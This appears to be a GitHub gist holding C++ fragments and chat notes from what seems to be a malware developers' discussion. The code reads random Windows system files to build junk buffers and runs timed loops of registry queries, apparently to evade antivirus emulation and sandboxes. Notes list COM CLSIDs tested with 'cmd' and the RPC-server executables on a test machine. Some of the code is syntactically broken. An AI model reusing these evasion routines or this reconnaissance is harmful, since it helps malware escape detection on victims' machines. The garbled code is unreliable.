-
-
Save SofianeHamlaoui/630309adaeb27068096f2023e76819a1 to your computer and use it in GitHub Desktop.
char* GetRandomBuf() | |
{ | |
char tempFileName[MAX_PATH]; | |
char targetFileName[MAX_PATH]; | |
// random | |
size_t randomNum = 8; | |
WIN32_FIND_DATAA ffd; | |
DWORD size = 0; | |
GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH); | |
GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH); | |
StringCchCatA(tempFileName, MAX_PATH, "\\\*"); | |
HANDLE f = FindFirstFileA(tempFileName, &ffd); | |
size_t count = 0; | |
char** fileNamesArr = new char*[5000]; | |
DWORD rbRead; | |
for (size_t i = 0; i < 5000; ++i) | |
fileNamesArr[i] = new char[MAX_PATH]; | |
// set randomly | |
size_t fileSize = 150000; | |
do | |
{ | |
if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) | |
{ | |
if (ffd.nFileSizeLow > fileSize) | |
{ | |
int a = 1; | |
int b = 2; | |
StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;) | |
++count; | |
a += b + count; | |
} | |
} | |
} while (FindNextFileA(f, &ffd) && count < 5000); | |
FindClose((HANDLE)f); | |
randomNum %= count; | |
StringCchCatA(targetFileName, MAX_PATH, "\\\"); | |
StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]); | |
HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL); | |
size = (DWORD)GetFileSize((HANDLE)hFile, nullptr); | |
char* buf = new char[size]; | |
ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr); | |
for (DWORD i = 0; i < fileSize; ++i) | |
{ | |
if (buf[i] == 0) | |
{ | |
size_t z = i; | |
size_t t = i * 32; | |
size_t y = i * 123 - 44 + i; | |
z = t * y % 255; | |
if (z != 0) | |
buf[i] = z; | |
else | |
buf[i] = z + 23; | |
i = 0; | |
} | |
} | |
/*delete[] fileNamesArr; | |
pCloseHandle(hFile); | |
*/ | |
buf[fileSize - 1] = 0; | |
return buf; | |
} | |
[24.09.21 15:37:40] orval: `` | |
bool QueryReg(char* buf, DWORD startTime) | |
{ | |
size_t result = 0; | |
LSTATUS errCode = 0; | |
HKEY hKey; | |
size_t step = 0; | |
//do random | |
char* parameterName = (char*) "zsadsgjea"; | |
//do random | |
char* parameterValue = (char*) "svogfiifotuz"; | |
DWORD dataSize = 12; | |
while (step < StrLen(buf) - 18) | |
{ | |
char* temp = (char*)MyHeapAlloc(12);// new char[12]; | |
temp[11] = 0; | |
m_memcpy(temp, buf + step, 11); | |
errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey); | |
if (errCode != ERROR_FILE_NOT_FOUND && hKey) | |
{ | |
errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize); | |
if (errCode != ERROR_SUCCESS && hKey) | |
++result; | |
} | |
//step += 18; | |
step += 40; | |
free(temp); | |
if ((DWORD)GetTickCount() - startTime > 1000 * 20) | |
break; | |
} | |
return result > 10; | |
} |
HKEY_CLASSES_ROOT\CLSID{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd
Negative result by audio so far
In particular, here are all the RPC servers on the test machine
[+] Exe starting RPC Server: C:{Windows\System32\AppVShNotify.exe
[+] Exe starting RPC Server: C:\Windows\System32\BioIso.exe
[+] Exe starting RPC Server: C:Windows\System32\ByteCodeGenerator.exe
[+] Exe starting RPC Server: C:{Windows\System32\FsIso.exe
[+] Exe starting RPC Server: C:Windows\System32\FXSSVC.exe
[+] Exe starting RPC Server: C:{Windows\System32\LsaIso.exe
[+] Exe starting RPC Server: C:Windows\System32\lsass.exe
[+] Exe starting RPC Server: C:{Windows\System32\mpnotify.exe
[+] Exe starting RPC Server: C:{Windows\System32\NetEvtFwdr.exe
[+] Exe starting RPC Server: C:{Windows\System32\NgcIso.exe
[+] Exe starting RPC Server: C:Windows\System32\rdpclip.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpinit.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpshell.exe
[+] Exe starting RPC Server: C:\Windows\System32\services.exe
[+] Exe starting RPC Server: C:Windows\System32\SgrmLpac.exe
[+] Exe starting RPC Server: C:{Windows\System32\svchost.exe
[+] Exe starting RPC Server: C:Windows\System32\TCPSVCS.EXE
[+] Exe starting RPC Server: C:{Windows\System32\WaaSMedicAgent.exe
[+] Exe starting RPC Server: C:\Windows\System32\wimserv.exe
[+] Exe starting RPC Server: C:\Windows\System32\wininit.exe
[+] Exe starting RPC Server: C:\Windows\System32\winlogon.exe
[+] Exe starting RPC Server: C:\Windows\System32\wlanext.exe
[+] Exe starting RPC Server: C:{Windows\System32\IME\IMJP\IMJPDCT.EXE